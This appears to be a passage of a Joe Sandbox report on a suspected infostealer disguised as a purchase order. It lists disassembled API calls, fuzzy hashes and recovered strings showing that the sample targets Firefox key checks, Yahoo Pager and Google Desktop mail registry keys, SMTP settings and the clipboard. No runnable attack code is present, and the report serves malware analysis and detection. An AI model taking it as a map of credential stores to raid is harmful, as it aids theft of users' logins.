                                                                                                      • Instruction Fuzzy Hash: 1F21B6B25003199BD711DB25CD42BDBB3F99F90304F10006BE749F7181DB78BB458A88
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 0040C02D
                                                                                                        • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,0000000D,?,?), ref: 00408E7F
                                                                                                        • Part of subcall function 00408DB6: memcpy.MSVCRT(00000000,00000001,?,?,?,?,?,00000000,76230A60), ref: 00408EBE
                                                                                                        • Part of subcall function 00408DB6: _mbscpy.MSVCRT(0045A550,strings,?,?,00409CE2,?,?,?,?,?,00000000,76230A60), ref: 00408E31
                                                                                                        • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                                                                                                        • Part of subcall function 004076B7: memset.MSVCRT ref: 004076D7
                                                                                                        • Part of subcall function 004076B7: sprintf.MSVCRT ref: 00407704
                                                                                                        • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407710
                                                                                                        • Part of subcall function 004076B7: memcpy.MSVCRT(00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407725
                                                                                                        • Part of subcall function 004076B7: strlen.MSVCRT ref: 00407733
                                                                                                        • Part of subcall function 004076B7: memcpy.MSVCRT(00000001,-00000004,00000001,-00000004,00000000,00000000,00000001,00000000,00000000,%s (%s),?,-00000004), ref: 00407743
                                                                                                        • Part of subcall function 004074EA: _mbscpy.MSVCRT(?,?), ref: 00407550
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcpystrlen$_mbscpymemset$LoadStringsprintf
                                                                                                      • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                                                      • API String ID: 2726666094-3614832568
                                                                                                      • Opcode ID: 97eb5deb3c91c9d9fc4f9eb44a96d397957ec68cd2003c875f3dea87c3c7232d
                                                                                                      • Instruction ID: 3f197bb1c4e5ac6b46efc8a66ab6c9b366feab3e355a1f8a4a72ad5c6a94b26c
                                                                                                      • Opcode Fuzzy Hash: 97eb5deb3c91c9d9fc4f9eb44a96d397957ec68cd2003c875f3dea87c3c7232d
                                                                                                      • Instruction Fuzzy Hash: 21212CB1C002189FDB80EF95D9817DDBBB4AF68314F10417FE648B7281EF385A458B99
                                                                                                      APIs
                                                                                                      • GetTempPathA.KERNEL32(00000104,?), ref: 0040C15D
                                                                                                      • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040C16F
                                                                                                      • GetTempFileNameA.KERNEL32(?,0044D644,00000000,?), ref: 0040C191
                                                                                                      • OpenClipboard.USER32(?), ref: 0040C1B1
                                                                                                      • GetLastError.KERNEL32 ref: 0040C1CA
                                                                                                      • DeleteFileA.KERNEL32(00000000), ref: 0040C1E7
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FileTemp$ClipboardDeleteDirectoryErrorLastNameOpenPathWindows
                                                                                                      • String ID:
                                                                                                      • API String ID: 2014771361-0
                                                                                                      • Opcode ID: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                                                                                                      • Instruction ID: f62812a52b3c8d3971b783ccdfc9367edaf682a71d5855f6ec34303c2df0b61c
                                                                                                      • Opcode Fuzzy Hash: 171ad759d1281e3ff1fcd56c2419c2c7234209d842af2eef4b8115ce05bff710
                                                                                                      • Instruction Fuzzy Hash: 69115276600218ABDB609B61DCCDFCB77BC9F15705F0401B6B685E60A2EBB499848F68
                                                                                                      APIs
                                                                                                      • memcmp.MSVCRT(-00000001,00456EA0,00000010,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 00406151
                                                                                                        • Part of subcall function 0040607F: memcmp.MSVCRT(00000000,0040616C,00000004,00000000), ref: 0040609D
                                                                                                        • Part of subcall function 0040607F: memcpy.MSVCRT(00000268,0000001A,?,00000000), ref: 004060CC
                                                                                                        • Part of subcall function 0040607F: memcpy.MSVCRT(-00000368,0000001F,00000060,00000268,0000001A,?,00000000), ref: 004060E1
                                                                                                      • memcmp.MSVCRT(-00000001,password-check,0000000E,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 0040617C
                                                                                                      • memcmp.MSVCRT(-00000001,global-salt,0000000B,00000000,?,00406271,00000000,00000000,00000000,00000000,?), ref: 004061A4
                                                                                                      • memcpy.MSVCRT(0000013F,00000000,00000000), ref: 004061C1
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcmp$memcpy
                                                                                                      • String ID: global-salt$password-check
                                                                                                      • API String ID: 231171946-3927197501
                                                                                                      • Opcode ID: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                                                                                                      • Instruction ID: a9589356fa14544f03300d4f181c1951213ca66e4b0bd31de1399f3a3b520bb8
                                                                                                      • Opcode Fuzzy Hash: 74ab0d982855b40a28d8c39abb951e864b1d3e85596098a6ddf56586a45c45d9
                                                                                                      • Instruction Fuzzy Hash: BB01FC70A003446EEF212A128C02B4F37569F50769F014037FE0A782C3E67DD679864D
                                                                                                      APIs
                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,0044418F,004441FB,?,00000000), ref: 00443481
                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 0044349C
                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434B2
                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434C8
                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434DE
                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,0044418F,004441FB,?,00000000), ref: 004434F4
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ??3@
                                                                                                      • String ID:
                                                                                                      • API String ID: 613200358-0
                                                                                                      • Opcode ID: ae7dc868dc48665b139d307d1f96ab593ff6b37e90ec57b5cf83d7c40c642e89
                                                                                                      • Instruction ID: 2c47959068043e69134c65afad444586b1a09f576c08bcd621988c2a5a0f38ec
                                                                                                      • Opcode Fuzzy Hash: ae7dc868dc48665b139d307d1f96ab593ff6b37e90ec57b5cf83d7c40c642e89
                                                                                                      • Instruction Fuzzy Hash: 3C016272E46D7167E2167E326402B8FA358AF40F2BB16010FF80477682CB2CBE5045EE
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 0040644F
                                                                                                      • memcpy.MSVCRT(?,00000060,?,?,00000000,?), ref: 00406462
                                                                                                      • memcpy.MSVCRT(?,00000060,?,?,?,?,?,00000000,?), ref: 00406475
                                                                                                        • Part of subcall function 00404888: memset.MSVCRT ref: 004048C2
                                                                                                        • Part of subcall function 00404888: memset.MSVCRT ref: 004048D6
                                                                                                        • Part of subcall function 00404888: memset.MSVCRT ref: 004048EA
                                                                                                        • Part of subcall function 00404888: memcpy.MSVCRT(?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?,?,?), ref: 004048FC
                                                                                                        • Part of subcall function 00404888: memcpy.MSVCRT(?,00406667,?,?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?), ref: 0040490E
                                                                                                      • memcpy.MSVCRT(?,?,00000014,?,00000040,00406667,00000060,?,?,?,00000040,00406667,?,?,?), ref: 004064B9
                                                                                                      • memcpy.MSVCRT(?,00000060,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 004064CC
                                                                                                      • memcpy.MSVCRT(?,?,00000014,?,00000040,00406667,?,?,?,?,?,?,?,?,?), ref: 004064F9
                                                                                                      • memcpy.MSVCRT(?,?,00000014,?,?,?,?,?,?,?,?,?), ref: 0040650E
                                                                                                        • Part of subcall function 00406286: memcpy.MSVCRT(?,?,00000008,?,?,?,?,?), ref: 004062B2
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcpy$memset
                                                                                                      • String ID:
                                                                                                      • API String ID: 438689982-0
                                                                                                      • Opcode ID: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
                                                                                                      • Instruction ID: e4a864fa4e69ec142fe4fd7b7713e32d962165e503c4b70a0fc0dcfbb4c29d3a
                                                                                                      • Opcode Fuzzy Hash: d6e541f26a2e21c8c6d6048cbe16156117454f978ff945f7822072589e58f8d2
                                                                                                      • Instruction Fuzzy Hash: 41415FB290054DBEEB51DAE9CC41EEFBB7CAB48344F004476F708F7151E634AA498BA5
                                                                                                      APIs
                                                                                                        • Part of subcall function 00403166: strchr.MSVCRT ref: 0040327B
                                                                                                      • memset.MSVCRT ref: 0040330B
                                                                                                      • GetPrivateProfileSectionA.KERNEL32(Personalities,?,000003FE,?), ref: 00403325
                                                                                                      • strchr.MSVCRT ref: 0040335A
                                                                                                        • Part of subcall function 004023E5: _mbsicmp.MSVCRT ref: 0040241D
                                                                                                      • strlen.MSVCRT ref: 0040339C
                                                                                                        • Part of subcall function 004023E5: _mbscmp.MSVCRT ref: 004023F9
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: strchr$PrivateProfileSection_mbscmp_mbsicmpmemsetstrlen
                                                                                                      • String ID: Personalities
                                                                                                      • API String ID: 2103853322-4287407858
                                                                                                      • Opcode ID: 5b98b57a55da65def1d776efa7645d3f4e73defe10c1c776d6f69e105cfa83b8
                                                                                                      • Instruction ID: 7d10b282734f65fdb38f5d5bab0bdada953f1de7ece3d1168d652590bcd45cd6
                                                                                                      • Opcode Fuzzy Hash: 5b98b57a55da65def1d776efa7645d3f4e73defe10c1c776d6f69e105cfa83b8
                                                                                                      • Instruction Fuzzy Hash: 6C21A872A041486AEB11EF699C81ADEBB7C9B51305F14007BFB04F7181DA7CDB46C66D
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 00444573
                                                                                                        • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00410E4A,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 00410AAF
                                                                                                        • Part of subcall function 00410ADD: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,00410E73,?,?,?,?,00410E73,00000000,?,?), ref: 00410AF8
                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 004445DF
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseOpenQueryValuememset
                                                                                                      • String ID: EOptions string$Software\Yahoo\Pager$Yahoo! User ID
                                                                                                      • API String ID: 1830152886-1703613266
                                                                                                      • Opcode ID: c25afbc6681bd6f67a4f4f243a5a512b3b390374a029d0210c15856865fede48
                                                                                                      • Instruction ID: e49b40feb516e52fd010a51085a75c79e183d02607987ed0dc43077d9115a6c0
                                                                                                      • Opcode Fuzzy Hash: c25afbc6681bd6f67a4f4f243a5a512b3b390374a029d0210c15856865fede48
                                                                                                      • Instruction Fuzzy Hash: E80196B6A00118BBEF11AA569D01F9A777CDF90355F1000A6FF08F2212E6749F599698
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memset
                                                                                                      • String ID: H
                                                                                                      • API String ID: 2221118986-2852464175
                                                                                                      • Opcode ID: b7a38b27e5c8f908588e1f47af6482a11fcf8a0e9f714cd4a67b4b1e91083b9c
                                                                                                      • Instruction ID: 41a1901620add3bbd0c629c105807ca0f7ae5b253a5bd6696a221ab72d79fc9a
                                                                                                      • Opcode Fuzzy Hash: b7a38b27e5c8f908588e1f47af6482a11fcf8a0e9f714cd4a67b4b1e91083b9c
                                                                                                      • Instruction Fuzzy Hash: C0916C75D00219DFDF24DFA5D881AEEB7B5FF48300F10849AE959AB201E734AA45CF98
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcpy
                                                                                                      • String ID: out of memory$statement aborts at %d: [%s] %s$string or blob too big
                                                                                                      • API String ID: 3510742995-3170954634
                                                                                                      • Opcode ID: f23b84750750ded9f2ffe7c3d94913c2e203849674d50945dde1510e429b7173
                                                                                                      • Instruction ID: e987c9c84479fff69dc62f11a90029b17cbd8b5ab9a96ddea988199e68ce63eb
                                                                                                      • Opcode Fuzzy Hash: f23b84750750ded9f2ffe7c3d94913c2e203849674d50945dde1510e429b7173
                                                                                                      • Instruction Fuzzy Hash: 2361C235B006259FCB04DF68E484BAEFBF1BF44314F55809AE904AB352D738E980CB98
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcpy$memset
                                                                                                      • String ID: winWrite1$winWrite2
                                                                                                      • API String ID: 438689982-3457389245
                                                                                                      • Opcode ID: ce9cd4edfa8dbd859274d61cf42db9548f248045a44c52f6141926f4a5991765
                                                                                                      • Instruction ID: c2532708ffcca3880dfc28061b61c902a2330187b6102c2a8a28e688d44e82e0
                                                                                                      • Opcode Fuzzy Hash: ce9cd4edfa8dbd859274d61cf42db9548f248045a44c52f6141926f4a5991765
                                                                                                      • Instruction Fuzzy Hash: 86418072A00209EBDF00DF95CC85BDE7775FF85315F14411AE924A7280D778EAA4CB99
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcpymemset
                                                                                                      • String ID: winRead
                                                                                                      • API String ID: 1297977491-2759563040
                                                                                                      • Opcode ID: 514c1e3a0802e780418d6592697ed91d227734cf7519c01181e8c1f66eabfdc8
                                                                                                      • Instruction ID: 3ec02e552038d814b148e8dc6d2e6fcfdb14063e9eab1ef980803e4d567ed084
                                                                                                      • Opcode Fuzzy Hash: 514c1e3a0802e780418d6592697ed91d227734cf7519c01181e8c1f66eabfdc8
                                                                                                      • Instruction Fuzzy Hash: DC31C372A00218ABDF10DF69CC46ADF776AEF84314F184026FE14DB241D334EE948BA9
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 0044955B
                                                                                                      • memset.MSVCRT ref: 0044956B
                                                                                                      • memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,00000000,?,00000000), ref: 004495C8
                                                                                                      • memcpy.MSVCRT(?,?,?,?,?,00000000,00000000,?,00000000), ref: 00449616
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: memcpymemset
                                                                                                      • String ID: gj
                                                                                                      • API String ID: 1297977491-4203073231
                                                                                                      • Opcode ID: 0d816628dddfc205dc81bb0cef5ba6c08625cdf510402cfd9794fe58c3b1b53e
                                                                                                      • Instruction ID: 902d5c3a1247e7abcff0c4a84da7d54d3a467651d8a5431b25503c8ae0e770b6
                                                                                                      • Opcode Fuzzy Hash: 0d816628dddfc205dc81bb0cef5ba6c08625cdf510402cfd9794fe58c3b1b53e
                                                                                                      • Instruction Fuzzy Hash: AF216A733443402BF7259A3ACC41B5B775DDFCA318F16041EF68A8B342E67AEA058715
                                                                                                      APIs
                                                                                                      • GetParent.USER32(?), ref: 004090C2
                                                                                                      • GetWindowRect.USER32(?,?), ref: 004090CF
                                                                                                      • GetClientRect.USER32(00000000,?), ref: 004090DA
                                                                                                      • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 004090EA
                                                                                                      • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00409106
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$Rect$ClientParentPoints
                                                                                                      • String ID:
                                                                                                      • API String ID: 4247780290-0
                                                                                                      • Opcode ID: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                                                                                                      • Instruction ID: bdfce0b549e0f997c013470e25be1f804495b962c90005f3873202e4793523b9
                                                                                                      • Opcode Fuzzy Hash: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                                                                                                      • Instruction Fuzzy Hash: 6A012D36801129BBDB119FA59C89EFFBFBCFF46750F044125FD05A2141D77455018BA5
                                                                                                      APIs
                                                                                                      • _strcmpi.MSVCRT ref: 0040E134
                                                                                                      • _strcmpi.MSVCRT ref: 0040E14D
                                                                                                      • _mbscpy.MSVCRT(?,smtp,0040DE7F,0040DE7F,?,?,00000000,000000FF), ref: 0040E19A
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _strcmpi$_mbscpy
                                                                                                      • String ID: smtp
                                                                                                      • API String ID: 2625860049-60245459
                                                                                                      • Opcode ID: 407fd4cd9c5cafa87f943c7cdde1874e153e025f22c42b823323a6ce76bf96c9
                                                                                                      • Instruction ID: 1dd5f7db1b4edf1a80ad81ce147274c535078e8a2a303909ef95c05f23963bac
                                                                                                      • Opcode Fuzzy Hash: 407fd4cd9c5cafa87f943c7cdde1874e153e025f22c42b823323a6ce76bf96c9
                                                                                                      • Instruction Fuzzy Hash: DB11C872500219ABEB10AB66CC41A8A7399EF40358F10453BE945F71C2EF39E9698B98
                                                                                                      APIs
                                                                                                        • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00410E4A,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 00410AAF
                                                                                                      • memset.MSVCRT ref: 00408258
                                                                                                        • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 004082A6
                                                                                                      • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 004082C3
                                                                                                      Strings
                                                                                                      • Software\Google\Google Desktop\Mailboxes, xrefs: 00408230
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Close$EnumOpenmemset
                                                                                                      • String ID: Software\Google\Google Desktop\Mailboxes
                                                                                                      • API String ID: 2255314230-2212045309
                                                                                                      • Opcode ID: cc5d6d64aea0813188cde2f76db8480d49896f172f032d850e05fd1d4fe80f83
                                                                                                      • Instruction ID: e7ff4aa50d33639bacb2d5000aefce928628a80d8311d3545e17288fa3d3d8ee
                                                                                                      • Opcode Fuzzy Hash: cc5d6d64aea0813188cde2f76db8480d49896f172f032d850e05fd1d4fe80f83
                                                                                                      • Instruction Fuzzy Hash: 9D118F72408345ABD710EE51DC01EABBBACEFD0344F04093EBD9491091EB75D958C6AA
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 0040C28C
                                                                                                      • SetFocus.USER32(?,?), ref: 0040C314
                                                                                                        • Part of subcall function 0040C256: PostMessageA.USER32(?,00000415,00000000,00000000), ref: 0040C265
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: FocusMessagePostmemset
                                                                                                      • String ID: S_@$l
                                                                                                      • API String ID: 3436799508-4018740455
                                                                                                      • Opcode ID: e2b80c6bc645313a4292a5829f5b0635f9a789c9535e0ddf74fc40c289d6b9ff
                                                                                                      • Instruction ID: f4172cee4733ded4edf5c13384372fb960b3a31eee454cf66b40e3553cb76095
                                                                                                      • Opcode Fuzzy Hash: e2b80c6bc645313a4292a5829f5b0635f9a789c9535e0ddf74fc40c289d6b9ff
                                                                                                      • Instruction Fuzzy Hash: 1411A172900158CBDF219B14CD457DE7BB9AF81308F0800F5E94C7B296C7B45A89CFA9
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000007.00000002.2565797426.0000000000456000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      • Associated: 00000007.00000002.2565797426.000000000045C000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_7_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _mbscpy
                                                                                                      • String ID: C^@$X$ini
                                                                                                      • API String ID: 714388716-917056472
                                                                                                      • Opcode ID: d9dcd15f5501d6044b59d83579e7760d9dc142544ad26eb0a5a2565b401737d3
                                                                                                      • Instruction ID: 848b4a5d233ab05c703a0d630411b91f0640a461eb42b4d170138ac17b774cf5
                                                                                                      • Opcode Fuzzy Hash: d9dcd15f5501d6044b59d83579e7760d9dc142544ad26eb0a5a2565b401737d3
                                                                                                      • Instruction Fuzzy Hash: F601B2B1D002489FDB50DFE9D9856CEBFF4AB08318F10802AE415F6240EB7895458F59
                                                                                                      APIs
                                                                                                        • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
                                                                                                        • Part of subcall function 00406FC7: _mbscpy.MSVCRT(?,00000000,?,00000000,0000003C,00000000,?,0040709F,Arial,0000000E,00000000), ref: 00407011
                                                                                                      • CreateFontIndirectA.GDI32(?), ref: 0040101F
                                                                                                      • SendDlgItemMessageA.USER32(?,000003EC,00000030,00000000,00000000), ref: 0040103E
                                                                                                      • SendDlgItemMessageA.USER32(?,000003EE,00000030,?,00000000), ref: 0040105B
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000007.00000002.2565797426.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
